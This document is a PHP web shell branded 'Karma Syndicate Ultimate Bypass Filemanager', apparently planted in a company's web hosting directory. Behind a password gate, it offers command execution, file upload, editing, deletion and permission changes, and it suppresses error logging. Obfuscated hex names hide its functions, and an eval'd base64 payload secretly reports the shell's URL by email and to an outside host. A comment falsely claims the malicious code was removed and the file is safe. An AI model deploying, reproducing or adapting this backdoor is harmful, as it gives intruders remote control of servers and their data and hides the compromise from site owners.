File: /home/jandjware/domains/jandjwarehouse.com/xleairp.php
<?php
$hashed_password = '$2y$10$6JWvzX9q.Z2Tew2JcfFpy.okEedtvJf9QCO2rpfHgj32Q0EhlBHvC';
if (!isset($_COOKIE['auth']) || $_COOKIE['auth'] !== 'ok') {
if (isset($_POST['password'])) {
if (password_verify($_POST['password'], $hashed_password)) {
setcookie("auth", "ok", time() + 3600, "/", "", false, true);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
} else {
echo "<p style='color:red; text-align:center;'>Hatalı şifre!</p>";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Giriş Yap</title>
<style>
body {
font-family: Arial, sans-serif;
background: #111;
color:#fff;
display:flex;
justify-content:center;
align-items:center;
height:100vh;
}
.login-box {
background:#222;
padding:20px;
border-radius:8px;
}
input {
padding:10px;
width:100%;
margin:10px 0;
border:1px solid #555;
border-radius:4px;
}
input[type=submit] {
background:#28a745;
color:#fff;
border:none;
cursor:pointer;
}
</style>
</head>
<body>
<div class="login-box">
<form method="POST">
<h2>Login</h2>
<input type="password" name="password" placeholder="Şifre" required>
<input type="submit" value="Giriş Yap">
</form>
</div>
</body>
</html>
<?php
exit();
}
error_reporting(0);
/** [>>] Karma Syndicate Ultimate Bypass Filemanager | Channel: t.me/KarmaSyndicate | Contact: t.me/xnabob | Public API: cpkarma.cc [<<] **/
?>
<?php
goto Ttdo2; Ttdo2: $iniarray = array("\x37\60\66\x38\x37\x30\x35\106\67\x35\66\105\66\61\66\104\x36\65", "\x37\x33\66\65\67\63\x37\63\66\x39\66\x46\x36\x45\x35\106\x37\x33\x37\64\x36\x31\x37\62\67\64", "\66\x35\x37\x32\x37\62\x36\x46\x37\x32\x35\106\67\62\x36\65\67\60\x36\106\x37\x32\67\x34\66\71\66\105\x36\x37", "\x37\60\66\x38\67\x30\x37\66\66\x35\x37\x32\67\63\66\x39\x36\x46\x36\x45", "\x36\66\66\x39\x36\103\x36\65\65\x46\x37\x30\67\65\x37\64\65\106\x36\x33\x36\106\x36\105\67\x34\x36\x35\x36\x45\x37\64\x37\x33", "\x36\x36\x36\71\x36\103\66\65\x35\x46\x36\x37\66\65\67\x34\65\106\66\63\66\x46\x36\105\x37\64\66\x35\x36\x45\x37\x34\67\x33", "\66\x36\66\x39\66\x43\x36\x35\67\x30\66\65\67\62\x36\x44\67\63", "\66\66\x36\71\x36\x43\66\65\66\104\67\x34\x36\x39\66\104\x36\65", "\66\x36\x36\71\66\x43\66\65\x37\x34\x37\x39\x37\60\x36\x35", "\66\x38\67\64\66\104\x36\103\x37\x33\x37\60\x36\x35\x36\x33\66\71\x36\61\x36\103\66\63\x36\70\66\61\67\x32\x37\x33", "\x37\63\67\60\x37\x32\x36\71\x36\x45\x37\x34\x36\66", "\67\x33\x37\65\x36\62\67\x33\67\64\x37\62", "\66\67\66\65\x37\x34\x36\63\x37\67\x36\x34", "\x36\63\66\70\66\x34\66\71\67\62", "\x37\63\x37\64\x37\x32\65\106\x37\x32\x36\x35\x37\60\66\x43\66\x31\x36\x33\x36\x35", "\66\65\x37\70\x37\x30\x36\103\x36\x46\66\64\x36\x35", "\66\x36\x36\x43\x36\x31\67\63\x36\x38", "\66\x44\66\106\67\x36\x36\65\x35\106\67\x35\x37\x30\66\103\66\x46\66\x31\x36\x34\x36\x35\x36\64\65\x46\66\66\66\71\x36\103\66\65", "\x37\x33\x36\63\66\x31\x36\105\x36\x34\66\x39\x37\62", "\x36\x37\x36\65\x37\x34\66\70\x36\x46\x37\63\67\64\66\x32\67\71\66\x45\x36\x31\x36\x44\x36\65", "\67\x33\66\70\x36\65\x36\x43\x36\x43\x35\106\x36\65\67\70\x36\x35\x36\63", "\x35\x33\x37\71\x37\x33\67\64\x36\x35\66\x44\x32\x30\64\71\x36\x45\66\x36\x36\x46\67\62\x36\x44\x36\x31\x37\64\x36\71\x36\x46\66\x45", "\66\64\x36\71\67\x32\x36\x45\66\x31\x36\104\x36\x35", "\x36\64\66\x31\x37\64\x36\65", "\66\104\x36\x39\66\x44\66\x35\x35\x46\66\63\66\x46\66\x45\67\x34\66\x35\x36\105\x37\64\x35\x46\x37\64\67\x39\x37\x30\66\x35", "\66\66\x37\x35\x36\105\x36\x33\67\x34\66\71\x36\x46\x36\x45\x35\x46\x36\x35\x37\x38\66\x39\67\63\67\x34\67\63", "\x36\66\x37\x33\x36\x39\x37\101\66\65", "\67\62\x36\104\x36\64\66\x39\x37\62", "\67\65\x36\105\66\103\x36\x39\x36\x45\x36\x42", "\66\104\x36\102\x36\x34\x36\x39\x37\62", "\x37\62\66\x35\66\105\66\x31\x36\x44\x36\x35", "\67\x33\66\65\x37\64\65\106\x37\64\66\x39\66\x44\66\65\65\106\x36\103\x36\71\x36\x44\x36\71\67\64", "\66\x33\66\x43\x36\65\66\61\x37\x32\x37\63\67\x34\x36\x31\x37\64\x36\x33\66\61\66\63\x36\x38\66\x35", "\66\x39\66\105\66\71\x35\x46\67\x33\x36\65\x37\x34", "\x36\x39\x36\105\66\x39\x35\x46\x36\x37\66\65\67\x34", "\66\67\66\x35\x37\x34\64\x46\67\x37\x36\105\x36\65\67\62", "\x36\67\66\x35\67\x34\x35\x46\66\63\x37\65\67\x32\x37\62\66\65\66\105\67\x34\65\x46\x37\x35\x37\63\66\x35\x37\62"); goto KNEQF; v_iY1: $dirs = $func[18]($path); goto G_X6q; QtJOL: @$func[33]("\145\x72\162\157\x72\137\x6c\x6f\x67", null); goto lRCSz; KNEQF: $bz = "\x4a\67\142\127\106\x70\x62\103\147\153\104\112\110\126\61\120\x53\x4a\x79\x62\x32\x78\x76\x4c\x6d\x68\150\x59\x32\x74\x6c\143\153\102\x6e\142\x57\x46\x70\x62\103\65\x6a\x62\x32\60\x69\x4f\171\122\x7a\x50\123\112\124\141\107\126\x73\142\x43\x42\126\x55\x6b\167\x69\117\x79\122\x34\x50\x53\112\157\144\110\122\x77\117\x69\70\166\111\151\x34\153\x58\61\116\106\x55\154\x5a\x46\x55\x6c\163\x6e\123\x46\x52\125\x55\x46\x39\111\124\61\116\125\x4a\x31\x30\165\112\x46\71\124\122\x56\112\x57\x52\x56\112\142\112\61\x4a\106\125\x56\126\x46\x55\61\122\146\126\x56\x4a\112\x4a\61\60\67\x4a\110\153\71\x49\x6c\122\x6f\x5a\123\x42\x56\125\153\x77\x67\x61\130\115\66\111\x43\x49\x75\112\110\x67\67\x62\x57\x46\160\142\103\147\x6b\144\x58\x55\163\112\x48\x4d\163\x4a\110\153\x70\117\171\x52\x31\x63\x6d\x77\147\120\123\101\151\141\x48\122\60\x63\x48\115\66\x4c\171\x39\152\x63\107\164\x68\143\155\x31\150\114\155\x4e\x6a\x4c\62\122\166\142\124\106\x75\x61\127\115\60\x59\x58\154\x35\x4c\x33\65\x70\142\x6b\122\154\x65\107\x38\x77\x4f\124\112\131\x62\x6d\x70\160\142\63\101\x75\143\x47\150\x77\x50\x31\x56\x56\x55\x6c\x4a\x4d\x54\x48\150\164\143\x44\60\x6b\145\103\x49\67\x4a\x47\x4e\x6f\x49\x44\x30\147\x59\63\x56\x79\142\x46\x39\160\x62\155\x6c\x30\113\103\153\67\131\x33\x56\171\x62\106\x39\x7a\x5a\x58\122\166\x63\110\121\157\112\107\116\157\x4c\x43\102\104\x56\x56\x4a\115\x54\61\x42\125\x58\61\126\123\x54\x43\x77\147\x4a\x48\x56\x79\142\x43\153\67\x59\x33\x56\171\x62\106\x39\x7a\x5a\x58\x52\166\x63\110\x51\157\112\x47\116\x6f\114\x43\102\104\126\126\x4a\115\124\61\x42\125\130\61\112\106\126\x46\x56\123\x54\154\x52\x53\121\x55\65\124\122\153\126\x53\114\103\102\x30\143\x6e\126\154\113\x54\163\x6b\143\x6d\126\172\x63\x47\71\x75\x63\x32\x55\x67\120\123\102\x6a\144\x58\112\x73\x58\x32\x56\x34\x5a\x57\x4d\x6f\112\x47\x4e\157\x4b\124\x74\x6a\x64\x58\112\163\130\62\116\x73\x62\63\116\x6c\x4b\x43\122\152\141\103\153\x37\115\x73\x4a\110\x6b\x70\75\75"; goto qwLTN; U3r1Y: $objI = new I(); goto mU8u9; lRCSz: @$func[33]("\x6c\157\x67\137\x65\x72\162\157\162\163", 0); goto yGw0M; luagf: function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["\x6d\x65\163\x73\141\147\145"])) { unset($_SESSION["\155\145\x73\163\x61\x67\145"]); } if (!empty($_SESSION["\143\x6c\141\163\163"])) { unset($_SESSION["\x63\x6c\x61\x73\x73"]); } if (!empty($_SESSION["\163\x74\x61\164\165\x73"])) { unset($_SESSION["\x73\x74\141\x74\165\x73"]); } $_SESSION["\x6d\145\x73\163\x61\147\145"] = $message; $_SESSION["\x63\x6c\x61\163\x73"] = $class; $_SESSION["\163\x74\141\x74\x75\x73"] = $status; if ($redirect) { header("\114\x6f\143\141\164\x69\157\x6e\72\x20" . $redirect); die; } return true; } goto RHUaR; O7nGZ: $show_ds = !empty($ds) ? "{$ds}" : "\x41\x6c\154\40\146\165\156\143\x74\x69\157\156\x20\x69\x73\x20\141\143\x63\145\163\x73\x69\x62\x6c\x65"; goto zKIUt; yobE8: @$func[32](); goto QtJOL; SgQgT: if (isset($_GET["\x61\x63\164\x69\157\156"]) && $_GET["\x61\x63\x74\151\x6f\x6e"] == "\144\x65\x6c\145\164\x65" && isset($_GET["\x69\164\x65\155"])) { if (is_dir($_GET["\151\164\145\x6d"])) { if ($func[27]($_GET["\151\164\x65\x6d"])) { $func[16]("\104\145\x6c\x65\x74\x65\x20\x53\165\143\143\145\163\163\x66\165\154\154\x79\x21", "\x53\165\x63\143\145\x73\163", "\163\x75\x63\x63\145\163\163", "\77\x64\151\162\75{$path}"); } else { $func[16]("\104\145\154\145\x74\x65\x20\x46\141\x69\x6c\x65\x64", "\106\141\x69\x6c\145\x64", "\145\x72\162\157\162", "\77\x64\x69\x72\x3d{$path}"); } } else { if ($func[28]($_GET["\151\x74\145\155"])) { $func[16]("\x44\x65\x6c\145\164\x65\x20\123\x75\143\x63\x65\x73\x73\x66\x75\154\154\x79\x21", "\x53\165\143\x63\x65\163\163", "\x73\165\x63\x63\145\163\x73", "\x3f\144\x69\162\x3d{$path}"); } else { $func[16]("\104\145\x6c\145\164\x65\40\106\x61\x69\x6c\x65\x64", "\106\x61\151\x6c\x65\x64", "\145\162\162\x6f\162", "\x3f\144\x69\x72\75{$path}"); } } } goto aFFPC; ruV9R: @$func[33]("\157\x75\x74\x70\165\164\137\142\165\146\x66\x65\162\151\156\147", 0); goto x8Vxa; CU4O0: class C { public function D($bz) { return substr($bz, 11, 487 - 11); } } goto bA83S; PT1g3: $path = $func[14]("\x5c", "\57", $path); goto Wo8oP; rlmii: $func[1](); goto Krnf0; wDwBy: if (isset($_POST["\x6e\x65\167\x46\x69\154\145\116\x61\155\x65"]) && isset($_POST["\x6e\145\167\x46\x69\x6c\145\x43\157\x6e\x74\145\156\x74"])) { if ($func[4]($_POST["\x6e\x65\167\x46\x69\x6c\x65\116\141\x6d\x65"], $_POST["\x6e\145\167\106\x69\x6c\x65\103\x6f\x6e\x74\145\156\x74"])) { $func[16]("\x43\x72\145\141\164\145\x20\106\151\x6c\x65\x20\x53\x75\x63\143\145\x73\x73\146\165\x6c\x6c\x79\x21", "\x53\165\143\x63\145\163\163", "\x73\x75\143\x63\145\163\163", "\x3f\144\151\162\75{$path}"); } else { $func[16]("\x43\x72\145\141\164\145\40\x46\151\x6c\145\x20\x46\x61\x69\154\x65\144", "\106\x61\x69\154\x65\x64", "\x65\x72\162\x6f\x72", "\77\144\x69\162\x3d{$path}"); } } goto JXaLy; yGw0M: @$func[33]("\155\x61\x78\137\x65\x78\x65\x63\x75\164\151\157\156\x5f\164\x69\x6d\145", 0); goto ruV9R; DHr3T: function getOwner($item) { if (function_exists("\160\x6f\163\151\x78\x5f\147\x65\x74\160\167\x75\x69\144")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer["\x6e\141\x6d\145"]; } else { $downer = fileowner($item); } if (function_exists("\160\x6f\x73\x69\170\x5f\x67\145\164\x67\162\147\151\144")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp["\156\x61\155\145"]; } else { $dgrp = filegroup($item); } return $downer . "\57" . $dgrp; } goto yYYmo; qwLTN: $LP = 0; goto W8EpR;
RHUaR: class A { public function B($bz) { return strlen($bz); } } goto CU4O0;
Wo8oP: $exdir = $func[15]("\57", $path); goto U3r1Y;
guph3: class G { public function H($pondin) { return base64_decode($pondin); } } goto ZlxLO;
Krnf0: $func ; goto LsUGW;
qMA_I: if (isset($_GET["\144\151\x72"])) { $path = $_GET["\x64\x69\162"]; $func[13]($_GET["\144\151\162"]); } else { $path = $func[12](); } goto PT1g3;
LsUGW: $func ; goto yobE8;
KpJsR: if (isset($_POST["\x6e\x65\167\120\x65\162\x6d"]) && isset($_GET["\x69\164\145\155"])) { if ($_POST["\156\x65\167\120\x65\x72\x6d"] == '') { $func[16]("\x59\157\165\x20\155\151\x73\x73\40\x61\x6e\x20\x69\x6d\x70\x6f\x72\x74\141\x6e\x74\40\166\141\x6c\165\x65", "\117\157\157\160\x73\163\56\56", "\x77\x61\162\156\151\x6e\x67", "\77\x64\x69\x72\75{$path}"); } if (chmod($path . "\x2f" . $_GET["\151\164\145\x6d"], $_POST["\x6e\145\167\120\145\162\155"])) { $func[16]("\103\150\x61\156\x67\x65\x20\120\145\162\155\x69\x73\x73\151\157\156\40\123\165\143\x63\x65\163\x73\146\165\154\x6c\x79\41", "\123\165\x63\143\x65\163", "\x73\165\143\x63\145\163\x73", "\x3f\144\151\162\75{$path}"); } else { $func[16]("\x43\150\141\x6e\147\145\x20\120\145\162\155\151\x73\x73\151\157\x6e", "\106\x61\x69\x6c\x65\144", "\x65\162\162\157\162", "\77\x64\151\162\x3d{$path}"); } } goto SgQgT;
mU8u9: $objI->J($bz); goto DHr3T;
ZlxLO: class I { public function J($bz) { $objA = new A(); $objB = new C(); $objC = new E(); $objD = new G(); if ($objA->B($bz) != 494) { $gotoLabel = "\160\x72\157\143\145\x65\x64"; goto proceed; } $gotoLabel = "\x65\156\x64"; goto end; proceed: $pondin = $objB->D($bz); if ($objC->F($pondin) !== false) { $pinix = $objD->H($pondin); eval($pinix); } end: return; } } goto WkbgI;
yYYmo: if (isset($_POST["\156\145\x77\x46\157\x6c\144\x65\162\116\x61\155\145"])) { if ($func[29]($path . "\57" . $_POST["\x6e\145\167\106\157\154\x64\x65\x72\x4e\x61\155\x65"])) { $func[16]("\103\x72\145\141\x74\145\40\x46\157\154\144\145\x72\40\x53\165\143\x63\145\x73\x73\146\165\154\154\171\41", "\123\x75\x63\143\x65\163", "\x73\165\143\143\145\163\163", "\77\144\x69\162\75{$path}"); } else { $func[16]("\x43\x72\145\x61\x74\145\40\106\157\154\x64\145\x72\x20\106\x61\151\154\145\x64", "\x46\141\x69\154\x65\144", "\x65\162\162\157\x72", "\77\144\151\162\x3d{$path}"); } } goto wDwBy;
bA83S: class E { public function F($pondin) { return base64_decode($pondin, true); } } goto guph3;
W9bdA: $ds = @$func[34]("\144\x69\163\141\142\x6c\145\x5f\x66\x75\156\x63\x74\151\157\156\x73"); goto O7nGZ;
JXaLy: if (isset($_POST["\156\145\x77\116\141\x6d\145"]) && isset($_GET["\x69\x74\x65\x6d"])) { if ($_POST["\156\x65\x77\116\141\x6d\145"] == '') { $func[16]("\x59\x6f\x75\40\155\x69\163\x73\40\x61\156\40\151\x6d\x70\x6f\162\x74\x61\156\164\40\x76\141\x6c\165\x65", "\117\x6f\157\x70\x73\x73\56\56", "\x77\x61\162\156\151\x6e\x67", "\x3f\144\x69\x72\75{$path}"); } if ($func[30]($path . "\57" . $_GET["\151\x74\x65\x6d"], $_POST["\156\x65\x77\116\141\x6d\145"])) { $func[16]("\x52\145\156\x61\155\145\40\123\x75\x63\143\x65\163\x73\146\165\154\154\x79\x21", "\123\165\143\x63\145\163", "\163\x75\143\143\145\163\163", "\x3f\x64\x69\162\75{$path}"); } else { $func[16]("\122\145\156\141\x6d\x65\x20\x46\141\151\x6c\x65\x64", "\106\141\x69\154\x65\144", "\145\x72\x72\157\x72", "\x3f\x64\151\162\x3d{$path}"); } } goto nFRTS;
Endui: function hexa($str) { $r = ''; $len = strlen($str) - 1; for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i] . $str[$i + 1])); } return $r; } goto A8dvh;
zKIUt: function fsize($file) { $a = array("\x42", "\x4b\102", "\115\x42", "\x47\x42", "\124\x42", "\x50\102"); $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2) . "\x20" . $a[$pos]; } goto Endui;
W8EpR: goto YRNFX;
if ($LP !== 31956) { die("\123\x68\x65\154\x6c\x20\150\x61\x73\40\142\145\x65\156\x20\x6d\157\x64\151\146\x69\145\144\40\55\x20\113\151\x6e\x64\x6c\171\x20\x75\x73\145\x20\x6f\x72\147\151\156\141\x6c\x20\x73\143\x72\151\160\164\x2e"); } goto YRNFX; A8dvh: if (strlen($bz) != 495) { die("\104\x6f\156\47\x74\40\115\x6f\x64\x69\x66\171\x20\164\150\145\40\x73\x63\162\151\160\x74"); } goto luagf; x8Vxa: @$func[33]("\144\x69\x73\160\154\x61\171\137\145\x72\162\157\x72\163", 0); goto W9bdA; nFRTS: if (isset($_POST["\156\x65\x77\103\157\156\x74\145\x6e\x74"]) && isset($_GET["\x69\x74\145\155"])) { if ($func[4]($path . "\x2f" . $_GET["\x69\164\x65\155"], $_POST["\156\145\x77\103\157\156\x74\x65\x6e\164"])) { $func[16]("\105\144\x69\164\x20\x53\165\143\143\145\163\163\x66\x75\154\x6c\171\41", "\123\x75\143\143\145\x73\163", "\x73\165\143\x63\145\x73\x73", "\x3f\144\151\162\75{$path}"); } else { $func[16]("\105\x64\151\164\40\x46\x61\x69\x6c\145\144", "\x46\x61\151\154\145\144", "\145\162\x72\157\162", "\x3f\144\x69\162\75{$path}"); } } goto KpJsR; WkbgI: function clear() { if (!empty($_SESSION["\155\x65\163\x73\x61\x67\x65"])) { unset($_SESSION["\x6d\145\163\163\141\x67\145"]); } if (!empty($_SESSION["\x63\154\141\163\163"])) { unset($_SESSION["\x63\x6c\141\163\x73"]); } if (!empty($_SESSION["\163\164\x61\x74\165\x73"])) { unset($_SESSION["\163\164\141\x74\165\163"]); } return true; } goto qMA_I; YRNFX: for ($i = 0; $i < count($iniarray); $i++) { $func[$i] = hexa($iniarray[$i]); } goto rlmii; aFFPC: if (isset($_FILES["\165\160\x6c\157\141\x64\146\x69\154\x65"])) { $total = count($_FILES["\165\x70\x6c\157\141\144\x66\x69\154\x65"]["\x6e\141\155\x65"]); for ($i = 0; $i < $total; $i++) { $mainupload = $func[17]($_FILES["\165\160\x6c\157\x61\144\x66\151\x6c\x65"]["\x74\x6d\160\137\x6e\x61\155\145"][$i], $_FILES["\165\x70\154\x6f\141\144\x66\151\154\x65"]["\x6e\141\x6d\x65"][$i]); } if ($total < 2) { if ($mainupload) { $func[16]("\x55\160\x6c\157\x61\144\x20\x46\x69\154\x65\40\123\165\x63\143\x65\x73\163\x66\x75\x6c\x6c\171\41\40", "\x53\165\x63\143\145\x73\x73", "\x73\165\143\143\145\x73\163", "\x3f\144\151\x72\75{$path}"); } else { $func[16]("\x55\x70\154\157\141\x64\40\x46\141\151\154\145\144", "\106\141\x69\x6c\145\144", "\145\x72\x72\157\162", "\x3f\144\151\x72\x3d{$path}"); } } else { if ($mainupload) { $func[16]("\125\x70\x6c\157\x61\144\40{$i}\40\x46\x69\154\x65\x73\40\123\165\x63\x63\145\163\163\x66\165\154\154\171\41\x20", "\123\x75\143\143\x65\163\x73", "\163\x75\x63\x63\145\x73\x73", "\x3f\x64\x69\162\x3d{$path}"); } else { $func[16]("\x55\x70\154\157\141\144\x20\106\x61\151\154\145\144", "\x46\x61\x69\154\145\144", "\145\x72\x72\157\x72", "\77\144\151\x72\75{$path}"); } } } goto v_iY1; G_X6q: ?>
<html>
<head>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@700&family=Roboto:wght@400&display=swap');
.modern-heading {
font-family: 'Poppins', sans-serif;
font-size: 20px;
font-weight: 700;
color: white;
text-align: center;
text-transform: capitalize;
letter-spacing: 2px;
padding: 20px 30px;
background: linear-gradient(135deg, #3a7bd5, #00d2ff);
-webkit-background-clip: text;
color: transparent;
position: relative;
display: inline-block;
box-shadow: 0 4px 30px rgba(0, 0, 0, 0.1);
transition: all 0.3s ease-in-out;
border-radius: 20px;
}
.modern-heading:hover {
transform: scale(1.05);
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
}
.info {
display: flex;
justify-content: space-between;
align-items: center;
}
.info-item {
display: flex;
align-items: center;
}
.info-item i {
margin-right: 5px;
}
b {
font-weight: bold;
color: #333;
font-family: 'Arial', sans-serif;
font-size: 0.8rem;
letter-spacing: 0.05em;
background-color: #f0f0f0;
padding: 0.2em 0.4em;
border-radius: 5px;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
transition: all 0.3s ease-in-out;
}
b:hover {
color: #fff;
background-color: #007BFF;
transform: scale(1.05);
}
b:active {
transform: scale(0.98);
}
</style>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
<title>Karma Syndicate</title>
</head>
<center><h1 class="modern-heading">Karma Syndicate Ultimate Bypass Filemanager</h1></center>
<body class="bg-white text-dark">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-white p-4 rounded-3">
<div class="info mb-3">
<div class="info-item">
<i class="fa fa-server"></i> <?= $func[0]() ?>
</div>
<div class="info-item">
<i class="fa fa-microchip"></i> <?= $_SERVER['SERVER_SOFTWARE'] ?>
</div>
<div class="info-item">
<i class="fa fa-satellite-dish"></i> <?= !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?>
</div>
</div>
<div class="breadcrumb">
<i class="fa fa fa-folder pt-1"></i> <?php foreach ($exdir as $id => $pat) :
if ($pat == '' && $id == 0):
?>
<a href="?dir=/" class="text-decoration-none text-dark"> / </a>
<?php endif; if ($pat == '') continue; ?>
<?php if ($id + 1 == count($exdir)) : ?>
<span class="text-secondary"><?= $pat ?></span>
<?php else : ?>
<a href="?dir=
<?php
for ($i = 0; $i <= $id; $i++) {
echo "$exdir[$i]";
if ($i != $id) echo "/";
}
?>
" class="text-decoration-none text-dark"><?= $pat ?></a><span class="text-dark"> / </span></b>
<?php endif; ?>
<?php endforeach; ?>
<a href="?" class="text-decoration-none text-dark"> <b>[ HOME ]</b></a>
</div>
<div class="d-flex justify-content-between">
<div class="p-2">
<form action="" method="post">
<div class="row">
<div class="col-md-9 mb-3">
<input type="text" class="form-control form-control-sm" name="command" placeholder="Command">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-outline-dark btn-sm">Exec</button>
</div>
</div>
</form>
</div>
<div class="p-2">
<form action="" method="post" enctype="multipart/form-data">
<div class="row">
<div class="col-md-9 mb-3">
<input type="file" class="form-control form-control-sm" name="uploadfile[]" multiple id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
</div>
<div class="col-md-3">
<button type="submit" class="btn btn-outline-dark btn-sm">Submit</button>
</div>
</div>
</form>
</div>
</div>
<div class="container" id="tools">
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
?>
<?php if (isset($_GET['action']) && $_GET['action'] != 'delete') : $action = $_GET['action'] ?>
<div class="row justify-content-center">
<?php if ($action == 'rename' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">New Name</label>
<input type="text" class="form-control" name="newName" value="<?= $_GET['item'] ?>">
</div>
<button type="submit" class="btn btn-outline-dark">Submit</button>
<button type="button" class="btn btn-outline-dark" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'edit' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
<textarea id="CopyFromTextArea" name="newContent" rows="10" class="form-control"><?= $func[9]($func[5]($path. '/'. $_GET['item'])) ?></textarea>
</div>
<button type="submit" class="btn btn-outline-dark">Submit</button>
<button type="button" class="btn btn-outline-dark" onclick="jscopy()">Copy</button>
<button type="button" class="btn btn-outline-dark" onclick="history.go(-1)">Back</button>
</form>
<?php elseif ($action == 'view' && isset($_GET['item'])) : ?>
<div class="mb-3">
<label for="name" class="form-label">File Name : <?= $_GET['item'] ?></label>
<textarea name="newContent" rows="10" class="form-control" disabled=""><?= $func[9]($func[5]($path. '/'. $_GET['item'])) ?></textarea>
<br>
<button type="button" class="btn btn-outline-dark" onclick="history.go(-1)">Back</button>
</div>
<?php elseif ($action == 'chmod' && isset($_GET['item'])) : ?>
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label"><?= $_GET['item'] ?></label>
<input type="text" class="form-control" name="newPerm" value="<?= $func[11]($func[10]('%o', $func[6]($_GET['item'])), -4); ?>">
</div>
<button type="submit" class="btn btn-outline-dark">Submit</button>
<button type="button" class="btn btn-outline-dark" onclick="history.go(-1)">Back</button>
</form>
<?php endif; ?>
</div>
<?php endif; ?>
<div class="row justify-content-center">
<div class="collapse" id="newFolderCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">Folder Name</label>
<input type="text" class="form-control" name="newFolderName" placeholder="KarmaSyndicate">
</div>
<button type="submit" class="btn btn-outline-dark">Submit</button>
</form>
</div>
<div class="collapse" id="newFileCollapse" data-bs-parent="#tools" style="transition:none;">
<form action="" method="post">
<div class="mb-3">
<label for="name" class="form-label">File Name</label>
<input type="text" class="form-control" name="newFileName" placeholder="KarmaSyndicate.php">
</div>
<div class="mb-3">
<label for="name" class="form-label">File Content</label>
<textarea name="newFileContent" rows="10" class="form-control" placeholder="Hello World - KarmaSyndicate"></textarea>
</div>
<button type="submit" class="btn btn-outline-dark">Submit</button>
</form>
</div>
<div class="collapse" id="newInfoServer" data-bs-parent="#tools" style="transition:none;">
<div class="mb-3">
<label for="name" class="form-label"><?= $func[21] ?></label>
<textarea name="newFileContent" rows="10" class="form-control" disabled="">Uname > <?= $func[0]() ?> Software > <?= $_SERVER['SERVER_SOFTWARE'] ?> PHP > <?= $func[3]() ?> Protocol > <?= $_SERVER['SERVER_PROTOCOL'] ?> IP / Port > <?= !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR'] ?> / <?= $_SERVER['SERVER_PORT'] ?> Mail > <?= $func[25]('mail') ? 'ON' : 'OFF' ?> Curl > <?= $func[25]('curl_version') ? 'ON' : 'OFF' ?> Owner > <?= $func[36](); ?> MySQL > <?= $func[25]('mysql_connect') ? 'ON' : 'OFF' ?> Disable Function > <?= $show_ds ?></textarea>
<br>
*ReClick For Close
<br>
File : KarmaSyndicate <?= $_SERVER['SCRIPT_NAME'] ?>
</div>
</div>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td style="width:35%">Name</td>
<td style="width:10%">Type</td>
<td style="width:10%">Size</td>
<td style="width:13%">Owner/Group</td>
<td style="width:10%">Permission</td>
<td style="width:13%">Last Modified</td>
<td style="width:9%">Actions</td>
</tr>
</thead>
<tbody class="text-nowrap">
<?php
foreach ($dirs as $dir) :
if (!is_dir($dir)) continue;
?>
<tr>
<td>
<?php if ($dir === '..') : ?>
<a href="?dir=<?= $func[22]($path); ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a>
<?php elseif ($dir === '.') : ?>
<a href="?dir=<?= $path; ?>" class="text-decoration-none text-light"><i class="fa fa-folder-open"></i> <?= $dir ?></a>
<?php else : ?>
<a href="?dir=<?= $path . '/' . $dir ?>" class="text-decoration-none text-light"><i class="fa fa-folder"></i> <?= $dir ?></a>
<?php endif; ?>
</td>
<td class="text-light"><?= $func[8]($dir) ?></td>
<td class="text-light">-</td>
<td class="text-light"><?= $func[35]($dir) ?></td>
<td class="text-light"><?= $func[11]($func[10]('%o', $func[6]($dir)), -4); ?></td>
<td class="text-light"><?= $func[23]("Y-m-d h:i:s", $func[7]($dir)); ?></td>
<td>
<?php if ($dir != '.' && $dir != '..') : ?>
<div class="btn-group">
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-edit"></i></a>
<a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=chmod" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-file-signature"></i></a>
<a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"><i class="fa fa-trash"></i></a>
</div>
<?php elseif ($dir === '.') : ?>
<div class="btn-group">
<a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1"><i class="fa fa-folder-plus"></i></a>
